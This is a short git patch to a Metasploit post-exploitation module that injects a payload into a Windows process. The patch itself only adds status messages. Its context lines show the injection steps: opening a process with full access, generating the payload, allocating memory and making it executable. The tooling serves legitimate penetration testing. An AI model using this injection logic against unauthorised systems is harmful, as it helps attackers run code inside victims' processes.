From ef5d3e1d023a6d0cac478f678313fe0ca8211cc9 Mon Sep 17 00:00:00 2001 From: Carlos Perez Date: Mon, 24 Oct 2011 01:12:38 +0000 Subject: [PATCH] Added more messages for the different stages in case a problems happens to better pinpoint it. git-svn-id: file:///home/svn/framework3/trunk@14039 4d416f70-5f16-0410-b530-b9f4589650da --- modules/post/windows/manage/payload_inject.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index c87ab36cef..cf3f4d6d54 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -186,8 +186,11 @@ class Metasploit3 < Msf::Post pid = create_temp_proc(pay) if newproc print_status("Injecting #{pay.name} into process ID #{pid}") begin + print_status("Opening process #{pid}") host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + print_status("Generating payload") raw = pay.generate + print_status("Allocating memory in procees #{pid}") mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) # Ensure memory is set for execution host_process.memory.protect(mem)